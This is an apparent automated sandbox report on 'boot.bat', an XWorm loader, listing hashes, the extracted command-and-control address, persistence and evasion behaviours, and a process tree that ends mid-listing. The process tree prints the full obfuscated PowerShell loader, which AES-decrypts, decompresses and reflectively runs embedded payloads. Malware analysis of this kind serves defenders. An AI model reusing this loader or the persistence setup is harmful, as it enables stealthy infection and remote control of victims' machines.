Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
06/07/2024, 07:02
Static task
static1
Behavioral task
behavioral1
Sample
boot.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
boot.bat
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
boot.bat
Resource
win11-20240704-en
General
-
Target
boot.bat
-
Size
410KB
-
MD5
d87efb4cf8da07e1956944f23313bb5b
-
SHA1
929203873eaf41e02377a26e1ef4db8a88d37696
-
SHA256
f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd
-
SHA512
d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a
-
SSDEEP
12288:xpWbCqT4gUVKkPSmSZ+XPk6V4mzYWQvKMbGt:xkGqTjURpXPkAUvvKMit
Malware Config
Extracted
xworm
case-shield.gl.at.ply.gg:26501
-
Install_directory
%Userprofile%
-
install_file
system.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2824-53-0x00000205D9050000-0x00000205D906A000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 17 2824 powershell.exe 20 2824 powershell.exe 41 2824 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2040 powershell.exe 2824 powershell.exe 4580 powershell.exe 5032 powershell.exe 5076 powershell.exe 1432 powershell.exe 1820 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3908 system.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\system svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe -
Modifies registry class 15 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133647229784149601" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133645874958710987" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133645874955898164" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133647229769461897" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU svchost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2672 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4580 powershell.exe 4580 powershell.exe 2040 powershell.exe 2040 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 5076 powershell.exe 5076 powershell.exe 1432 powershell.exe 1432 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 1820 powershell.exe 1820 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 5032 powershell.exe 5032 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe Token: 35 2040 powershell.exe Token: 36 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe Token: 35 2040 powershell.exe Token: 36 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe Token: 35 2040 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2824 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 636 wrote to memory of 4384 636 cmd.exe 86 PID 636 wrote to memory of 4384 636 cmd.exe 86 PID 636 wrote to memory of 4580 636 cmd.exe 87 PID 636 wrote to memory of 4580 636 cmd.exe 87 PID 4580 wrote to memory of 2040 4580 powershell.exe 88 PID 4580 wrote to memory of 2040 4580 powershell.exe 88 PID 4580 wrote to memory of 2956 4580 powershell.exe 91 PID 4580 wrote to memory of 2956 4580 powershell.exe 91 PID 2956 wrote to memory of 4568 2956 WScript.exe 92 PID 2956 wrote to memory of 4568 2956 WScript.exe 92 PID 4568 wrote to memory of 264 4568 cmd.exe 94 PID 4568 wrote to memory of 264 4568 cmd.exe 94 PID 4568 wrote to memory of 2824 4568 cmd.exe 95 PID 4568 wrote to memory of 2824 4568 cmd.exe 95 PID 2824 wrote to memory of 3404 2824 powershell.exe 56 PID 2824 wrote to memory of 2752 2824 powershell.exe 47 PID 2824 wrote to memory of 1764 2824 powershell.exe 68 PID 2824 wrote to memory of 2156 2824 powershell.exe 40 PID 2824 wrote to memory of 4512 2824 powershell.exe 65 PID 2824 wrote to memory of 1908 2824 powershell.exe 33 PID 2824 wrote to memory of 3524 2824 powershell.exe 57 PID 2824 wrote to memory of 1744 2824 powershell.exe 30 PID 2824 wrote to memory of 1660 2824 powershell.exe 28 PID 2824 wrote to memory of 1340 2824 powershell.exe 23 PID 2824 wrote to memory of 1532 2824 powershell.exe 27 PID 2824 wrote to memory of 1332 2824 powershell.exe 22 PID 2824 wrote to memory of 740 2824 powershell.exe 14 PID 2824 wrote to memory of 2708 2824 powershell.exe 46 PID 2824 wrote to memory of 2904 2824 powershell.exe 72 PID 2824 wrote to memory of 1524 2824 powershell.exe 26 PID 2824 wrote to memory of 1916 2824 powershell.exe 34 PID 2824 wrote to memory of 536 2824 powershell.exe 66 PID 2824 wrote to memory of 2696 2824 powershell.exe 45 PID 2824 wrote to memory of 3320 2824 powershell.exe 55 PID 2824 wrote to memory of 2100 2824 powershell.exe 39 PID 2824 wrote to memory of 908 2824 powershell.exe 11 PID 2824 wrote to memory of 1104 2824 powershell.exe 18 PID 2824 wrote to memory of 2088 2824 powershell.exe 38 PID 2824 wrote to memory of 2280 2824 powershell.exe 41 PID 2824 wrote to memory of 3064 2824 powershell.exe 52 PID 2824 wrote to memory of 1092 2824 powershell.exe 17 PID 2824 wrote to memory of 692 2824 powershell.exe 69 PID 2824 wrote to memory of 1280 2824 powershell.exe 21 PID 2824 wrote to memory of 956 2824 powershell.exe 12 PID 2824 wrote to memory of 1468 2824 powershell.exe 25 PID 2824 wrote to memory of 2448 2824 powershell.exe 43 PID 2824 wrote to memory of 1460 2824 powershell.exe 24 PID 2824 wrote to memory of 2440 2824 powershell.exe 42 PID 2824 wrote to memory of 1196 2824 powershell.exe 19 PID 2824 wrote to memory of 1044 2824 powershell.exe 16 PID 2824 wrote to memory of 1828 2824 powershell.exe 32 PID 2824 wrote to memory of 2804 2824 powershell.exe 50 PID 2824 wrote to memory of 1216 2824 powershell.exe 20 PID 2824 wrote to memory of 2788 2824 powershell.exe 49 PID 2824 wrote to memory of 1996 2824 powershell.exe 36 PID 2824 wrote to memory of 1036 2824 powershell.exe 15 PID 2824 wrote to memory of 1988 2824 powershell.exe 35 PID 2824 wrote to memory of 1672 2824 powershell.exe 29 PID 2824 wrote to memory of 796 2824 powershell.exe 10 PID 2824 wrote to memory of 1780 2824 powershell.exe 31 PID 2824 wrote to memory of 5076 2824 powershell.exe 96 PID 2824 wrote to memory of 5076 2824 powershell.exe 96 PID 2824 wrote to memory of 1432 2824 powershell.exe 98 PID 2824 wrote to memory of 1432 2824 powershell.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
PID:796 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:3384
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:4376
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1216 -
C:\Users\Admin\system.exeC:\Users\Admin\system.exe2⤵
- Executes dropped EXE
PID:3908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3320
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3404
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\boot.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Local\Temp\boot.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580 -
